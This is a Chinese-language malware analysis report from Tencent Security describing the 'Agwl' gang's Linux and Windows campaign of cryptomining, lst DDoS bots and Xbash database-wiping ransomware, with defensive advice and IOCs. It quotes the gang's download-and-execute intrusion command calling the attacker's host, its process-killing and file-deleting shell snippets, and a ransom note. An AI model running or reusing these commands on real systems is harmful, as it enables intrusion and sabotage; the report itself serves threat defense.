Agwl 病毒團伙對 Linux 系統的三連擊：挖礦、DDoS、刪庫勒索

作者：騰訊安全御見威脅情報中心
來源：https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ

騰訊安全御見威脅情報中心監測到“Agwl”團伙在近期的入侵行動將Linux系統納入攻擊范圍。

一、背景

騰訊安全御見威脅情報中心監測到“Agwl”團伙在近期的入侵行動將Linux系統納入攻擊范圍。“Agwl”團伙于2018年7月被御見威脅情報中心發現，其攻擊特點為探測phpStudy搭建的網站，并針對其網站搭建時使用的默認的MySQL弱口令進行爆破登錄，從而植入挖礦以及遠控木馬。

該團伙早期入侵后植入的都是基于Windows平臺的木馬，其挖礦木馬部分會首選清除其他挖礦程序、阻止其他挖礦木馬訪問礦池、獨享系統資源。而最近的更新中，我們監測發現，“Agwl”團伙增加了對Linux系統的攻擊，入侵成功后加入基于Linux系統執行的bash腳本代碼s667。該腳本運行后會添加自身到定時任務，并進一步下載Linux平臺下的CPU挖礦木馬bashf和GPU挖礦木馬bashg。

然而此時攻擊并沒有結束，“Agwl”團伙會繼續植入Linux平臺的DDoS病毒lst（有國外研究者命名為“Mayday”）以及勒索蠕蟲病毒Xbash。Xbash勒索病毒會從C2服務器讀取攻擊IP地址段，掃描這些網絡中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服務器進行爆破攻擊，爆破登錄成功后不像其他勒索病毒那樣去加密數據再勒索酬金，而是直接將數據庫文件刪除后騙取酬金，企業一旦中招將會遭受嚴重損失。

“Agwl”團伙攻擊流程

二、詳細分析

中招主機通過phpStudy一鍵部署PHP環境，默認情況下包含phpinfo及phpMyAdmin并且任何人都可以訪問，同時安裝的MySQL默認口令為弱口令密碼并且開啟在外網3306端口。在未設置安全組或者安全組為放通全端口的情況下，受到攻擊者對于phpStudy的針對性探測，并且暴露了其MySQL弱口令。攻擊者使用MySQL弱口令登錄后,在web目錄下執行Shell，并在其中添加植入挖礦木馬的惡意代碼。

入侵后執行shell命令為：

cmd.exe /c "certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667

“Agwl”團伙對Windows平臺植入的木馬為Down.exe，針對Linux平臺植入的是s667。

Down.exe

Down.exe為自解壓程序，解壓后釋放一個hosts文件和7個BAT文件。根據解壓命令，文件被釋放到C:\Windows\debug\SYSTEM 目錄下，首先被執行的是start.bat

Start.bat主要功能為：

創建目錄C:\ProgramData\Microsoft\test并設置為隱藏，將down.bat、open.bat、skycmd.bat拷貝到該目錄中并安裝為計劃任務反復執行，對應的計劃任務名分別為“SYSTEM”、“DNS”、“skycmd”；然后從www[.]kuaishounew.com下載wget.exe作為后續下載工具；最后啟動start2.bat。

Start2.bat的功能為：

利用start.bat中下載的wget.exe從微軟官方下載vc_redist.x64.exe，從www[.]kuaishounew.com下載unzip.exe(后續用到的解壓工具)和hook.exe，然后執行install3.bat。

（vcredist_x64.exe是微軟的Visual C運行時庫,安裝后能夠在未安裝VC的電腦上運行由 Visual C++開發的64位應用，該模塊被下載以保證64位木馬正常運行。）

Install3.bat主要用于木馬的三個服務“SYSTEM”、“DNS”、“skycmd”的安裝和保持。

1、服務“SYSTEM”

執行的腳本為down.bat，主要功能為下載礦機程序wrsngm.zip進行挖礦，該礦機程序為開源挖礦程序xmr-stak修改而成，github地址https[:]//github.com/fireice-uk/xmr-stak。

使用礦池：wk.skjsl.com:3333

錢包：4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33

該錢包上線時間不長，查詢收益目前僅獲得0.7個XMR

2、服務“DNS”

對應執行的腳本為open.bat。功能為替換本地域名解析文件hosts，然后啟動挖礦程序。

替換后的hosts文件將其他的礦池域名解析指向127.0.0.1，阻止其正常訪問從而獨占挖礦所需的計算資源。從該文件中還會將木馬原來的C2地址從111.230.195.174遷移至116.206.177.144。

open.bat還會啟動qc.bat來清除入侵過程中在xampp、www、phpstudy目錄下載殘留的EXE木馬，以及badboy.php、test00.php木馬。

3、服務“skycmd”

執行腳本skycmd.bat。功能為下載skycmdst.txt，重命名為skycmdst.bat并執行，目前下載該文件為網頁文件，但黑客可通過后臺配置動態更改下載的惡意代碼。

s667

s667為入侵Linux系統后首先執行的腳本。腳本判斷當前是否是root權限，如果不是則下載lower23.sh到/tmp/目錄并通過nohup bash命令執行；如果是root權限則添加下載執行s667的定時任務，每5分鐘執行一次，然后下載rootv23.sh到/tmp/目錄并通過nohup bash命令執行。

最終下載執行的bash腳本lower23.sh或root23.sh負責植入Linux版本挖礦木馬、清理競品挖礦木馬以及植入其他病毒等功能。

在function kills()中對競品挖礦木馬進行清除：

1、按照進程名匹配（包括被安全廠商多次披露的利用redis入侵挖礦的木馬“ddg*”、“sourplum”、”wnTKYg”）。

pkill -f sourplum

pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg

pkill -f biosetjenkins

pkill -f Loopback

pkill -f apaceha

pkill -f cryptonight

pkill -f stratum

pkill -f mixnerdx

pkill -f performedl

pkill -f JnKihGjn

pkill -f irqba2anc1

pkill -f irqba5xnc1

pkill -f irqbnc1

pkill -f ir29xc1

pkill -f conns

pkill -f irqbalance

pkill -f crypto-pool

pkill -f minexmr

pkill -f XJnRj

pkill -f NXLAi

2、按照礦池匹配，殺死連接指定礦池的進程

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9

3、按照端口匹配，殺死使用端口9999/5555/7777/14444進行tcp通信的進程

PORT_NUMBER=9999

lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print$2}' | xargs kill -9

PORT_NUMBER=5555

lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print$2}' | xargs kill -9

PORT_NUMBER=7777

lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print$2}' | xargs kill -9

PORT_NUMBER=14444

lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print$2}' | xargs kill -9

4、刪除指定目錄文件

rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius

rm -rf /tmp/index_bak

rm -rf /tmp/httpd.conf

rm -rf /tmp/*httpd.conf

rm -rf /tmp/a7b104c270

rm -rf /tmp/httpd.conf

rm -rf /tmp/conn

rm -rf /tmp/conns

rm -f /tmp/irq.sh

rm -f /tmp/irqbalanc1

rm -f /tmp/irq

在function downloadyam()中下載Linux挖礦程序bashg(由開源GPU挖礦程序xmr-stak編譯)和配置文件pools.txt；下載Linux平臺CPU挖礦程序bashf(采用開源挖礦程序XMRig編譯)以及配置文件名config.json。兩種挖礦程序均使用與攻擊Windows平臺時相同的門羅幣礦池和錢包。

DDoS病毒

lower23.sh在完成挖礦功能后，還會植入基于Linux的DDoS病毒lst(國外廠商命名為Mayday)

lst搜集以下信息，并將其保存至結構g_statBase中：

系統版本

CPU核心數及其時鐘速率

CPU負載

網絡負載

創建一個新線程CThreadTaskManager :: ProcessMain（），將開始攻擊和終止攻擊的命令放入執行隊列。在此之后，創建一個新線程CThreadHostStatus :: ProcessMain（），在此線程中，CPU和網絡負載的數據每秒更新一次，如果接到請求，可以隨時將數據發送到C＆C服務器。

然后創建20個線程，從任務隊列中讀取信息，并根據讀取的信息啟動攻擊或終止攻擊。

建立與C＆C的連接后，進入處理來自C＆C的消息的無限循環。如果命令具有參數，則C＆C則會發送另外4個字節，病毒根據接收到的不同參數執行不同類型的DDoS攻擊。

執行DDoS攻擊命令協議如下：

0×01 發起攻擊，參數定義攻擊的類型和要使用的線程數。攻擊類型由一個字節定義，該字節可以取值0x80到0x84，共有5種攻擊類型：

0x80 - TCP洪水攻擊。

0x81 - UDP洪水攻擊。

0x82 - ICMP洪水攻擊。

0x83,0x84 - 兩次DNS洪水攻擊。兩種攻擊都類似于0x81，除了端口53（DNS服務的默認端口）用作目標端口。

0x02 終止攻擊。

0x03 更新配置文件。

0x04 用于將當前命令的執行狀態發送到C＆C服務器。

勒索蠕蟲

lower23.sh繼續植入在基于Linux平臺執行的勒索蠕蟲病毒Xbash

Xbash為使用PyInstaller將Python代碼打包生成的ELF格式可執行程序，用于感染Linux系統。使用工具pyi-archive_viewer可提取出其中的pyc文件，然后通過反編譯程序將其還原成Python代碼。

Xbash會通過弱口令爆破和已知的服務器組件漏洞進行攻擊，而且會刪除目標系統中的數據庫，在刪除數據后提示勒索比特幣，然而并沒有發現其具有恢復數據的功能。

掃描端口：

HTTP：80,8080,8888,8000,8001,8088

VNC：5900,5901,5902,5903

MySQL：3306

Memcached：11211

MySQL/MariaDB：3309,3308,3360 3306,3307,9806,1433

FTP：21

Telnet：23,2233

PostgreSQL：5432

Redis：6379,2379

ElasticSearch：9200

MongoDB：27017

RDP：3389

UPnP/SSDP：1900

NTP：123

DNS：53

SNMP：161

LDAP：389

Rexec：512

Rlogin：513

Rsh：514

Rsync：873

Oracle數據庫：1521

CouchDB：5984

對于某些服務，如VNC，Rsync，MySQL，MariaDB，Memcached，PostgreSQL，MongoDB和phpMyAdmin，如果相關端口打開，則使用內置的弱用戶名/密碼字典進行爆破登錄

爆破登錄成功后對用戶的數據庫進行刪除：

然后在數據庫中創建勒索提示文本PLEASE_README_XYZ，勒索金額為0.02個比特幣：

Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database', LygJdH8fN7BCk2cwwNBRWqMZqL1','backupsql@pm.me

三、安全建議

1. 加固服務器，修補服務器安全漏洞，對于phpStudy一類的集成環境，在安裝結束后應及時修改MySQL密碼為強密碼，避免被黑客探測入侵。

2. 服務備份重要數據，并進行內網外網隔離防止重要數據丟失。檢查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服務器使用的弱口令。

3. 網站管理員可使用騰訊云網站管家智能防護平臺（網址：https://s.tencent.com/product/wzgj/index.html），該系統具備Web入侵防護，0Day漏洞補丁修復等多緯度防御策略，可全面保護網站系統安全。

4. 使用騰訊御界高級威脅檢測系統檢測未知黑客的各種可疑攻擊行為。御界高級威脅檢測系統，是基于騰訊反病毒實驗室的安全能力、依托騰訊在云和端的海量數據，研發出的獨特威脅情報和惡意檢測模型系統。

IOCs

IP

116.206.177.144

Domain

down.ctosus.ru

wk.skjsl.com

fk3.f3322.org

sbkcbig.f3322.net

URL

http[:]//down.ctosus.ru/bat.exe

http[:]//wk.skjsl.com:93/s667

http[:]//wk.skjsl.com:93/lowerv23.sh

http[:]//wk.skjsl.com:93/rootv23.sh

http[:]//wk.skjsl.com:93/xlk

http[:]//wk.skjsl.com/wrsngm.zip

http[:]//wk.skjsl.com/downulr.txt

http[:]//wk.skjsl.com/config.sjon

http[:]//wk.skjsl.com/bashf

http[:]//wk.skjsl.com/bashg

http[:]//wk.skjsl.com/pools.txt

http[:]//wk.skjsl.com/lst

http[:]//wk.skjsl.com/XbashH

http[:]//wk.skjsl.com/NetSyst96.dll

http[:]//www.kuaishounew.com/Down.exe

http[:]//www.kuaishounew.com/apps.txt

http[:]//www.kuaishounew.com/hook.exe

http[:]//www.kuaishounew.com/hehe.exe

http[:]//www.kuaishounew.com/office.exe

http[:]//www.kuaishounew.com/hehe.exe

http[:]//www.kuaishounew.com/hosts

http[:]//116.206.177.144/wrsngm.zip

http[:]//fk3.f3322.org/skycmdst.txt

md5

51d49c455bd66c9447ad52ebdb7c526a

fb9922e88f71a8265e23082b8ff3d417

cacde9b9815ad834fc4fb806594eb830

17f00668f51592c215266fdbce2e4246

40834e200ef27cc87f7b996fe5d44898

3897bdb933047f7e1fcba060b7e49b40

39ea5004a6e24b9b52349f5e56e8c742

8fdfe319255e1d939fe5f4502e55deee

13f337029bae8b4167d544961befa360

1b93e030d2d6f1cef92b2b6323ff9e9e

589ba3aac5119fc4e2682bafb699727b

82d28855a99013c70348e217c162ceb9

門羅幣錢包1：

4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7

門羅幣錢包2:

4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33

比特幣錢包：

1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1

郵箱：

backupsql@pm.me

參考鏈接

https://www.freebuf.com/column/195035.html

https://www.freebuf.com/column/178753.html

https://securelist.com/versatile-ddos-trojan-for-linux/64361/

https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

本文由 Seebug Paper 發布，如需轉載請注明來源。本文地址：http://www.bjnorthway.com/1005/